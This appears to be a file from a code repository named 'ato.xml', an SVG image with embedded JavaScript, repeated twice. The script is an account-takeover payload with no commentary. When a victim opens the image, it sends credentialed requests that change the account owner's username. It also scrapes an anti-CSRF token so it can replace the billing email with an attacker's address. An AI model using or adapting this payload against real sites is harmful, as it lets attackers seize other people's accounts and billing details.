zulfi0/ato.xml

## ato.xml
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
  "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg width="100%" height="100%" viewBox="0 0 100 100"
     xmlns="http://www.w3.org/2000/svg">

  <script type="text/javascript">
    // <![CDATA[
     function submitRequest() {
        var x = new XMLHttpRequest();
        x.open("POST", "https://www.example.com/Admin/Users/OwnerDetails.aspx?merchantId=[victim merchantId]&sid=[victim sid]", false);
        x.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9");
        x.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
        x.setRequestHeader("Accept-Language", "id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7");
        x.withCredentials = "true";
        var body = "usernameTextBox=victim&main%24saveButton=Save";
        var eBody = new Uint8Array(body.length);
        for (var i=0; i < eBody.length; i++)
          eBody[i] = body.charCodeAt(i);
        x.send(new Blob([eBody]));
      }
      try {
        submitRequest();
      }catch(e){
        location.href = "https://www.example.com"
      }

     function email() {
        var req = new XMLHttpRequest();
        req.open('GET','https://www.example.com/account/BillInfo.asp?sid=[victim sid]',false);
        req.send();
        var response = req.responseText;
        var parser = new DOMParser();
        var doc = parser.parseFromString(response, "text/html")
        var token = doc.getElementsByName("RequestVerificationToken")[0].value;

        var x = new XMLHttpRequest();
        x.open("POST", "https://www.example.com/account/BillInfo.asp?sid=[victim sid]", false);
        x.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9");
        x.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
        x.setRequestHeader("Accept-Language", "id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7");
        var body = "Billingemail=attcker%40gmail.com&originalBillingemail=attacker%40gmail.com&RequestVerificationToken="+encodeURIComponent(token)+"&Submit=Save&cmd=submit";
        x.send(body);
      }
      try {
        email();
      }catch(e){
        location.href = "https://www.example.com"
      }
    // ]]>
  </script>
</svg>
	<?xml version="1.0" standalone="no"?>
	<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
	"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
	<svg width="100%" height="100%" viewBox="0 0 100 100"
	xmlns="http://www.w3.org/2000/svg">

	<script type="text/javascript">
	// <![CDATA[
	function submitRequest() {
	var x = new XMLHttpRequest();
	x.open("POST", "https://www.example.com/Admin/Users/OwnerDetails.aspx?merchantId=[victim merchantId]&sid=[victim sid]", false);
	x.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9");
	x.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
	x.setRequestHeader("Accept-Language", "id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7");
	x.withCredentials = "true";
	var body = "usernameTextBox=victim&main%24saveButton=Save";
	var eBody = new Uint8Array(body.length);
	for (var i=0; i < eBody.length; i++)
	eBody[i] = body.charCodeAt(i);
	x.send(new Blob([eBody]));
	}
	try {
	submitRequest();
	}catch(e){
	location.href = "https://www.example.com"
	}

	function email() {
	var req = new XMLHttpRequest();
	req.open('GET','https://www.example.com/account/BillInfo.asp?sid=[victim sid]',false);
	req.send();
	var response = req.responseText;
	var parser = new DOMParser();
	var doc = parser.parseFromString(response, "text/html")
	var token = doc.getElementsByName("RequestVerificationToken")[0].value;

	var x = new XMLHttpRequest();
	x.open("POST", "https://www.example.com/account/BillInfo.asp?sid=[victim sid]", false);
	x.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9");
	x.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
	x.setRequestHeader("Accept-Language", "id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7");
	var body = "Billingemail=attcker%40gmail.com&originalBillingemail=attacker%40gmail.com&RequestVerificationToken="+encodeURIComponent(token)+"&Submit=Save&cmd=submit";
	x.send(body);
	}
	try {
	email();
	}catch(e){
	location.href = "https://www.example.com"
	}
	// ]]>
	</script>
	</svg>
No results found